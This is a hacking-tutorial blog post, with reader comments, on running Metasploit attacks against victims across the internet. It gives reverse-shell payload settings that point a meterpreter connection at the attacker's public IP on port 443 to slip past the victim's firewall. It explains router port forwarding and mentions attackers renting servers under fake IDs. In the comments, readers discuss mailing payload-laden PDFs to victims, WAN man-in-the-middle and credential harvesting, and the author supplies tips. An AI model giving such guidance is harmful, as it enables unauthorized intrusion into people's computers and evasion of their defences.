• 8,051
  • 91
  • +458
  • 520
How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

Bookmark

Type : Tutorial

Level : Medium, Advanced

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network :-) .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this :-) ) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) :-)

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share :-)

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Hacking WAN not LAN

Information(Attacker) :

- Attacker1 use local IP address –> 192.168.8.8

- Attacker1 have public IP address –> 73.67.123.85

- Attacker1 can control his router to redirect any incoming/outgoing traffic.

- Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

- Victim1 have local IP address –> 192.168.1.2

- Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

- Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443

When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding :-)

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise :-)

Hope you found it useful.

If information I wrote here was wrong, let me know I'll correct it :-)

Get the latest hacking tutorial by subscribe to this website :

Subscribe Hacking Tutorial

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps | Vishnu Valentino Hacking Tutorial, Tips and Trick

  • http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse_https-backdoors Backdoor detector

    There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.
    http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse_https-backdoors

  • Xt

    A demo video of this would be helpful. 

    • http://www.vishnuvalentino.com v4L

      #Xt
      sorry for that, but you can do it yourself when you have the requirement I describe above

  • w0lF 3¥e

    V4L i lik ur tuts… :)
    I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and creatd a host…& installed DUC their free client program…then i portforwd my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME INORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!

  • http://freeshare17.blogspot.com/ freeshare17

    Nice info master, mantap. :)

  • Hitch4000

    Hi,
    nice tutorial!
    I was just wondering, if you don't have a static IP. Couldn't you just use no-ip(http://www.no-ip.com/) to create a hostname to point to your dynamic IP?

    And then set localhost like this: set lhost <yourhostname>
    Bind the payload to an PDF file, and mail it to a victim

    Do you think this is posible?  

     

    • http://www.vishnuvalentino.com v4L

      #Hitch4000
      Yep it’s possible :-)
      I’ve already wrote it here and here

  • Pingback: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server « Exohacker

  • http://asdh.com Rijju

    Bro How To Setup VPN ? :@

    • http://www.vishnuvalentino.com v4L

      #Rijju
      Maybe 1st you can see the explanation about VPN here http://en.wikipedia.org/wiki/Virtual_private_network, because VPN and VPS is something totally different.
      If you ask about VPN, you can use program like TOR, HotSpot Shield, OpenVPN, etc…
      but if you ask about VPS, you can ask further to your hosting provider about how to set it up(fyi:it’s not a free service you should pay monthly fee).

  • http://asdh.com Rijju

    bRo Just Ek Bat BAtado Ke Port Forwarding Ke Liye Jo Apne tarika Diya He Isme Jo Ip he Wo Router Ki Ip He yA Host Ip He ?

  • Papgaur

    Do u have to use backtrack to hack a remote pc ? I only have metaspolit with armitage. can u use just this instead? will it work on windows 7???

    • http://www.vishnuvalentino.com v4L

      #Papgaur
      You also can use it in Windows, afaik there’s metasploit in Windows…but if you use Linux(I’m using Backtrack) it will be more simple and easier. I’m suggest using Backtrack because this distro already designed to do computer hacking / pentest.

  • Mohit

    hey  bro  how  to  OPEN  closed  port  m  using  USB  DONGLE  nd  my ISP has BLOCKED  ALL PORTS.so  when i pratice  ur attack  in  my  lab  i didn't get successfull due to closed  ports . 
     
     
    one more  thing  how to use  metasploit  to  hack  web server  . and web application  give me ny tutorial  

    • http://www.vishnuvalentino.com v4L

      #Mohit
      usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
      you need to find which port are open both victim & attacker (usually port 80, 443, etc)

  • sivaraaj

    Sir how to install VPS server….?

    • http://www.vishnuvalentino.com v4L

      #sivaraaj
      you should buy it, then you can install it… :-) the most easy way you can buy an internet packet from your provider with public ip address…

  • Pingback: Hacking Jcow Social Networking Webserver » Akiramitsu

  • orsettobubu

    I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
    How to use a dns sever CENTOS I miss something in the configuration of named.conf? I hope it can help

    • http://www.vishnuvalentino.com v4L

      #orsettobubu
      hmm…yep I think maybe you miss something in your configuration…

  • subiyanto

    yup ok**banget untuk kami kaum yg tertidas**untuk pedidikan**

  • piyush

     
    hey im a big fan of your blog and hats off to your tutorials :D
    ok let me get to the point
    i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
    here are the settings which i used:-
    in the port forwarding tab i have given my local ip address:192.168.1.x
    with the port no:443
    i have configured the network of my virtual machine to bridge 
    in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
    DNS1:8.8.8.8
    DNS2:8.8.4.4
    after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
    but nothing , he said it gave a 404 error 
    i dont know why :(
    please help me out in doing port forwarding stuff if im doing it wrong
    peace

    • http://www.vishnuvalentino.com v4L

      #piyush
      if you give that ip 192.168.1.x to your friend, of course won’t work..it’s local port…you should give your router address..
      on your router usually there’s forwarding port…so when someone open ip like : 121.23.45.72:9999 the router should redirect that request to your local ip address.

  • piyush

    thanx for your lightning fast comment bro… :D
    i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes" 
    then it says IP address of the set web server i type "my local IP"
    then it says is your payload handler on diffrent IP i type "no" 
    after all that it says failed to blind to 192.168.1.4:80 
    i dont know why ?
    please help 
    and im a NOOB please do elaborate 
    thanx

    • http://www.vishnuvalentino.com v4L

      #piyush
      ip address of set web server should be your router, your router will forward every incoming packet that come to port 80 to your local IP.

  • joand

    HI .
    I read your tuts thats very cool really.. i need your help little )) how can i find other computers in my lan ..everytime i try nmap result is 1 host up(thats me) ..i want to try sslstrip but for that i dont find any computer for proceed ..i have beetel router ..i hope you can solve this issue ))
    thanks

    • http://www.vishnuvalentino.com v4L

      #joand
      did you have other clients connected with your local network?
      if yes and you still find nothing, then it’s because the firewall blocked your nmap request.
      if you ask to scan other ip outside your network, the answers is yes and no….
      yes if you can route your network to the network destination you want to scan
      no if you can’t do that

  • joand

    hi someone can tell ..how to scan ip behind the router …becouse everytime i scan wd nmap result is 1 host up..how i can get other host computer

  • rk

    I was waiting for the stuff for years… the way u explained is just Great

  • joand

    thank perfect answer ))))

  • jaond

    do need to telnet every WAN ip to execute MITM? even i have access to router login and password..can you please make a detail tutorial on MITM on WAN?  it is possible to telnet WAN ip ?

    • http://www.vishnuvalentino.com v4L

      #joand
      btw usually MITM do inside a local network(but doesn’t mean it can’t do in public network)…
      yes you need to remote your server on the internet…but it’s better to learn on your local network..
      yes it’s possible if the server has a vulnerability.

  • joand

    Sir the problem is i do not have any other host computer in my lan network…and i want to know how can i find other host computer to execute any attack like MITM?

    • http://www.vishnuvalentino.com v4L

      #joand
      if you already know the logic for this MITM, it will much easier for you to understanding further…
      if not, then my suggestion is : it’s better you try on your local network..if you don’t have other computer, then build a virtual machine and learn + try it first on your computer how to perform this.

  • joand

    i have virtual machine backtrack OS .and i do successfully mitm on my window xp….and got all the ssl logs… in Lan all successful execute
    as i say i have two ip ..lan is .192.168.1.x…and wan ip is 122.145.23.x like that..scan wan ip i got result many host ip live . …here is the question how can i redirect all outgoing and incoming traffic of these wan ip's through my host computer..
    please if possible  tell in detail thank you for your previous reply :)

    • http://www.vishnuvalentino.com v4L

      #joand
      If you can do that on your local network, then it remains the same for public…

  • joand

    if i knew how to do it i would not ask you LOL …

  • joand

    Give a man a fish …make me smile ))) it true indeed
    i know a guy who is also alone in his lan network but he is doing mitm successfully on other guys comp..just dnt know how he get these comps for attack ..and he dnt even want to tell me lol ))) i try my best to find way but smtimes got confuse and run in many directions ))

  • Baldassarre

     
    Hi v4L, 
    your tutorials are great.
    For this kind of attack, how can I find the victim's open ports? For example I have his public ip and then what I have to do? I've tried to forward a port and it succeded, it was really open that port, but I need to forward a port that the victim has open too! How can I find it? 
    I thank you for your time
    Baldassarre

    • http://www.vishnuvalentino.com v4L

      #Baldassarre
      Actually if you saw the picture, you can scan victim 2 directly;
      but if it was victim 1, while you scan the ip, it’s not actual victim 1 ip address but it was the router(victim 1 was behind the router).
      btw if you read this tutorial, it wasn’t talk about scanning ip address or something you describe in your question. :-)

  • timetraveler

    Hi my friend, I have port forward my router and i made a nessus scan of a remote host. It’s vulnerable and i’m trying to exploit it. How do i set up my payload, should i set my open port or should i set the port of the vulnerable application (php)?

  • john D

    Hello.i want to ask if the hack is possible to made without the VPS or other host server just using our internal or external IP can be work?thanks a lot

    • http://www.vishnuvalentino.com v4L

      #john D
      you can view my other post here http://www./hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/

  • Avinash

    can we hack any internet service provider and can use internet free of cost with airtel,docomo,idea?

    • http://www.vishnuvalentino.com v4L

      #Avinash
      oops i didn’t know about it…i also didn’t use their service :-)

  • Deepsa

    hi, i want to remote access xp cmd in lan via ip address through lhost and rhost method i’m using backtrack r1 …do not want to use any virus, pdf, link etc,etc…i just know victim local ip address …will u plz help me

    • http://www.vishnuvalentino.com v4L

      #Deepsa
      then the answer is NOT.
      only a vulnerable OS you can do like that.

  • sniffer

    thanks Bro

  • Bree

    Hi , I dont have access to the router administration (only my father have the pswd :p and won’t give it to me )I’m runing bt can I do NAPT just by using iptables in order to do this :
    192.168.1.12 : 443 = xx.xx.xx.xx : yyy
    xx.xx.xx.xx is my public ip and yyy the port that the payload will use .. help please :’(

    • http://www.vishnuvalentino.com v4L

      #Bree
      you need to have an access to your router

      • Bree

        ok thanks a lot :)

  • Rahul

    can we hack a PC which is from another country or another state or city?
    let me clear it if i want to hack a pc and he has their own internet connection and i have a pc and i have my own internet connection. can i hack ? or for WAN hacking 1st we need to connect our backtrack with their internet(WAN) ?

    • http://www.vishnuvalentino.com v4L

      #Rahul
      maybe you can use client hacking.

      • Rahul

        thanks for reply…. sorry didnt get client hacking any article on this ?

  • Boris

    MAN YOU ARE A TOTAL STUD, FIRST DAY READING AND IM ADDICTED. THANK YOU! GREETINGS FROM BULGARIA

    • http://www.vishnuvalentino.com v4L

      #boris
      Thanks

  • Ronit

    hello vishnu ….
    i need to know that how can i remotely control my cafes route from my home with a laptop via internet…

  • jason

    Hi.
    This things was as easy as 123 for me before. That was when I still on a static IP and have a router. But I moved to a place where I can only connect to the cyberspace via 3G dongle that is behind an ISP NAT and have a Dynamic IP.
    Any advice on doing this using 3G dongle? I also don't have a router to port forward to my local ip. I tried No-IP but it didn't work.
    Thanks

    • http://www.vishnuvalentino.com v4L

      #jason
      you must have a full control to your router to forward incoming packet to your local network.

  • zain

    u didnt told what ip address we have to set for victum wan ip or local ip coz if we set wan ip it will only connect with router not lan ips explain plz

    • http://www.vishnuvalentino.com v4L

      #zain
      that’s why you need to forward the packet from router to your local network.
      if you use router box, find your manufacturer brand and find how to do port forwarding e.g:http://www.dd-wrt.com/wiki/index.php/Port_Forwarding
      if your router is a pc(windows), see here http://www./hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/

      • c4

        port forward at attacker side or client side or both?

        • http://www.vishnuvalentino.com v4L

          #c4

          attacker side

          • c4

            thank u sir for ur quick response

  • Jake Lancaster

    I was wondering when u say Attacker1 & Attacker2 those are just 2 different ways you can* attack correct you dont actually have to have 2 attackers?

    • http://www.vishnuvalentino.com v4L

      #Jake

      yes correct…you can choose one of them or if you have both also ok

  • victor

    Thanks for your tutorial …

    An ISP assigns dynamic IPs to its subscribers via WIFI or 3G dongle. the question is:

    Will the wan hack work in this scenario? I don’t think so, but if yes how port forwarding works?

    • http://www.vishnuvalentino.com v4L

      #victor

      it’s depend how the ISP share their dynamic IP, whether they use public or private IP.

      if use private, port forwarding will not work except you can access their router. If public, yes you can directly connect to your machine.

      • victor

        Now it’s become very clear to me.

        Thanks, perfect answer! very appreciate.

        • nomad

          it’s certainly public but the ip will only change if you reconnect the router, if your router doesn’t reconnect by itself (like mine which is a pain in the ass) you’ll be fine

  • root

    when i port forwarding , and i scanned my ip with nmap to see if the port is open that show port filtered , that mean is working? or it isn’t?

    • http://www.vishnuvalentino.com v4L

      #root

      if your IP was behind NAT, maybe it’s your firewall IP and they filter it.

  • nomad

    a question, if i use RPORT 443 and another LPORT like… LPORT 666, will it work if i forward port 666 to my attacker machine ?

  • TheKingofdemon33

    How do i port forward iPhone hotspot internet? Please help.

  • hunter

    should i connect wire to wire with local lan to perform attack out of lan??

  • Frank

    I’ve read over this many times. I see how you attack victim 2. Of course. But victim 1 is behind the router so how do you direct a query to a LAN side up without being on the network? I know I can ping a router public ip (wan) but if I’m not on the network I can’t see anything on the other side.